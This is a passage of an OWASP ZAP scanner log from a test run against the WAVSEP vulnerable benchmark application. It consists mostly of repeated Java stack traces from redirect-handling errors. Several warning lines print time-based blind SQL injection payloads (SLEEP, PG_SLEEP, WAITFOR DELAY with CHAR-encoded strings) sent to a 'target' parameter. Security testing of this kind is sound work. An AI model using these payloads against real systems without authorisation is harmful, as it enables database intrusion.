org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682447 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');(SELECT * FROM (SELECT(SLEEP(5)))pWfd)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))pWfd)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682448 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';(SELECT * FROM (SELECT(SLEEP(5)))uzxJ)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))uzxJ)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682449 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))LZkl)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))LZkl)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682450 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))nYrL)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))nYrL)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682451 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682451 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682453 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682454 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682456 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682457 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682458 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at 